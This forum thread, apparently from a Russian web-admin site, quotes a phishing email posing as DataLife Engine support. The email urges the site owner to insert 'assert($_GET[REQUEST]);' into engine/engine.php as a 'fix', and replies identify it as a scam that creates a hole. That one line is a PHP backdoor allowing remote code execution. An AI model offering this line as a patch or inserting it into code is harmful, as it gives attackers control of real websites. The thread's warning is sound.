Ваш сайт подвержен взлому!

вопрос

Всем привет!
Сегодня на мыло получил сообщение с таким содержимым:

Ваш сайт сайт.com подвержен взлому!
От кого: "САЙТ.Com"
Кому: хххххх@inbox.ru

Саня,

Данное письмо вам отправил support@dle-news.ru с сайта сайт.com

------------------------------------------------
Текст сообщения
------------------------------------------------

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте сайт.com нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);

С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 162.244.33.213

------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма

С уважением,

Администрация сайт.com

На официальном сайте ничего об этом не написано. В php не шарю и что означает эта строка понятия не имею, посему решил спросить здесь у знатоков.
Это такой новый развод или это действительно фикс?

Ответил: Decart

Все новые уязвимости техподдержка DLE всегда выкладывает у себя на сайте http://dle-news.ru/bags/.
Если есть лицензия, можно написать в техподдержку и спросить.
Добавив этот код, вы просто создадите уязвимость на сайте, с помощью которой в дальнейшем может быть осуществлен взлом или другие неправомерные действия.
Не ведитесь на разные фейки...

Fancybox.bind("[data-highslide]", { groupAttr: 'data-highslide', idle:2000, Thumbs: false, caption: (fancybox, slide) => { if( slide.thumbEl && slide.thumbEl.alt ) { return slide.thumbEl.alt } } });

4 комментария

Местный

425

Serik - 2015-04-1718 октября 2014 07:22 - #36360

Развод. Не станут админы или служба поддержки регаться на Вашем сайте и слать с него подобное письмо :)
Если бы фикс - получили бы уведомление с сайта dle-news.ru

СПАСИБО надо тыкать в кнопку!